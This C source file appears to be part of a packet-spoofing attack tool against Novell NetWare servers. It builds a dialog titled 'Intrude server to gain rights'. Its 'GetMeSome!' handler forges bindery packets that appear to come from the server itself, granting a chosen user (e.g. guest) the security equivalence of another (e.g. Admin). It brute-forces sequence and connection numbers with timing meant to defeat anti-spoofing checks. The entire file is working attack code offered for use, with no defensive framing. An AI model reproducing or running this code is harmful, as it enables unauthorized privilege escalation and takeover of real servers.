#include "panrcp.h"

/* Preference variables*/
MOBJECT manual_screen;
MOBJECT result,server_network,server_addr,getfromuser,givetouser,
        socket_low,socket_high,connection_number,guess_number;

void QuitGameOver(MOBJECT p, void *s, void *v)
{
 MShellDestroy(p);
}

void GameOver(MOBJECT p, void *s, void *v)
{
 int i,j,k;
 clock_t elapsed;
 char get_user[54],give_user[54],tmp[42];
 char string[13];

 if (Pan_Adapter)
  {
   Packet_Info *pInfo=(Packet_Info *)calloc(1,sizeof(Packet_Info));
   MEditChangeText(result, 0, 42, "Giving more credits...", 42);

   for(i=0;i<6;i++) pInfo->server_mac[i]=0xff;
   pInfo->task_number=1;
   pInfo->sequence=0;   /* sequence no. */
   strncpy(string,MEditValue(server_network),8);
   str_to_hex(string,pInfo->server_network,8);
   strncpy(string,MEditValue(server_addr),12);
   str_to_hex(string,pInfo->server_addr,12);
   memcpy(pInfo->my_network,pInfo->server_network,4); /* server to itself  */
   memcpy(pInfo->my_addr,pInfo->server_addr,6);
   pInfo->socket_high=str_to_uint8((char *)MEditValue(socket_high));
   pInfo->socket_low=str_to_uint8((char *)MEditValue(socket_low));
   strncpy(get_user,MEditValue(getfromuser),54);
   strncpy(give_user,MEditValue(givetouser),54);
   

   if (!MTButtonGetActivationStatus(guess_number))
    {
     pInfo->connection_number=atoi(MEditValue(connection_number));

     SpoofBindSecEqu(pInfo,
                     give_user,strlen(give_user),get_user,strlen(get_user));

     for(i=0;i<256;i+=3)
      {
       for (j=0;j<3;j++)
        {
         elapsed=clock();
         pInfo->to_server[46]=i+j;   /* sequence no. */
         GUI_Pan_Spoof_One(pInfo->to_server,
                           76+
                           strlen(get_user)+
                           strlen(give_user)+
                           8);
         /* A smart clock timming prevents anti-sequence-spoofing */
         while (((clock()-elapsed)/(CLK_TCK/50))<1){};
        }
      }
    }
   else
    {
     MEditChangeText(connection_number, 0, 3,"", 3);

     SpoofBindSecEqu(pInfo,
                     give_user,strlen(give_user),get_user,strlen(get_user));

     for(k=1;k<11;k++)
      {
       sprintf(tmp,"Trying with connection %d/10",k);
       MEditChangeText(result, 0, 42, tmp, 42);
       for(i=0;i<256;i+=3)
        {
         for (j=0;j<3;j++)
          {
           elapsed=clock();
           pInfo->to_server[46]=i+j;   /* sequence no. */
           pInfo->to_server[47]=k;     /* connection number */
           GUI_Pan_Spoof_One(pInfo->to_server,
                             76+
                             strlen(get_user)+
                             strlen(give_user)+
                             8);
           /* A smart clock timming prevents anti-sequence-spoofing */
           while (((clock()-elapsed)/(CLK_TCK/50))<1){};
          }
        }
      }
    }
   MEditChangeText(result, 0, 42, "Done. Try login as the user we gave rights", 42);
   free(pInfo);
  }
 else MEditChangeText(result, 0, 42, "Adapter not opened", 42);
}

void game_over(MOBJECT o, void *o_data, void *a_data)
{
 MOBJECT form_id;
 MOBJECT label;
 
 manual_screen = MCreateShell("Intrude server to gain rights", SF_MODAL);
 MObjectSetBackgroundRGB(manual_screen, 56, 112, 112);

 form_id = MCreateRowForm(manual_screen);
 MObjectSetBackgroundRGB(form_id, 56, 112, 112);

 label = MCreateLabel(form_id, "Server internal net (4 bytes hex)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 server_network = MCreateClippedEdit(form_id, "", 8, 8, FIXED_SMALL);
 MRightAttach(server_network, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(server_network, 56, 112, 112);
 MObjectSetForegroundRGB(server_network, 192, 176, 160);

 label = MCreateLabel(form_id, "Server address (6b usually 000000000001)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 server_addr = MCreateClippedEdit(form_id, "000000000001", 12, 12, FIXED_SMALL);
 MRightAttach(server_addr, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(server_addr, 56, 112, 112);
 MObjectSetForegroundRGB(server_addr, 192, 176, 160);

 label = MCreateLabel(form_id, "Server socket high (1b usually 40)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 socket_high = MCreateClippedEdit(form_id, "40", 2, 2, FIXED_SMALL);
 MRightAttach(socket_high, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(socket_high, 56, 112, 112);
 MObjectSetForegroundRGB(socket_high, 192, 176, 160);

 label = MCreateLabel(form_id, "Server socket low (1b usually 07)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 socket_low = MCreateClippedEdit(form_id, "07", 2, 2, FIXED_SMALL);
 MRightAttach(socket_low, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(socket_low, 56, 112, 112);
 MObjectSetForegroundRGB(socket_low, 192, 176, 160);

 label = MCreateLabel(form_id, "Bindery context user to get rights from\n(eg. Admin)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 getfromuser = MCreateClippedEdit(form_id, "", 54, 8, FIXED_SMALL);
 MRightAttach(getfromuser, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(getfromuser, 56, 112, 112);
 MObjectSetForegroundRGB(getfromuser, 192, 176, 160);

 label = MCreateLabel(form_id, "Bindery context user to give rights to\n(eg. guest)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 givetouser = MCreateClippedEdit(form_id, "", 54, 8, FIXED_SMALL);
 MRightAttach(givetouser, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(givetouser, 56, 112, 112);
 MObjectSetForegroundRGB(givetouser, 192, 176, 160);

 guess_number = MCreateTButton(form_id, "Let me guess conn. number", FIXED_SMALL);

 label = MCreateLabel(form_id, "Server connection number (int, usually 1)", FIXED_SMALL);
 MRightAttach(label, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(label, 56, 112, 112);
 MObjectSetForegroundRGB(label, 255, 255, 255);

 connection_number = MCreateClippedEdit(form_id, "1", 3, 3, FIXED_SMALL);
 MRightAttach(connection_number, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(connection_number, 56, 112, 112);
 MObjectSetForegroundRGB(connection_number, 192, 176, 160);

 result = MCreateClippedEdit(form_id, "I need more credit...", 42, 42, FIXED_SMALL);
 MRightAttach(result, F_ATT_NONE, 3, NULL);
 MObjectSetBackgroundRGB(result, 56, 112, 112);
 MObjectSetForegroundRGB(result, 192, 176, 160);
 MObjectSetUnsensitive(result);

 form_id = MCreateColForm(manual_screen);
 MObjectSetBackgroundRGB(form_id, 56, 112, 112);

 label = MCreatePButton(form_id, "GetMeSome!", FIXED_SMALL);
 MPButtonSetCallback(label, GameOver, 0L);

 label = MCreatePButton(form_id, "Quit", FIXED_SMALL);
 MPButtonSetCallback(label, QuitGameOver, 0L);

 MShellRealize(manual_screen);
}
/****************************************************************************/
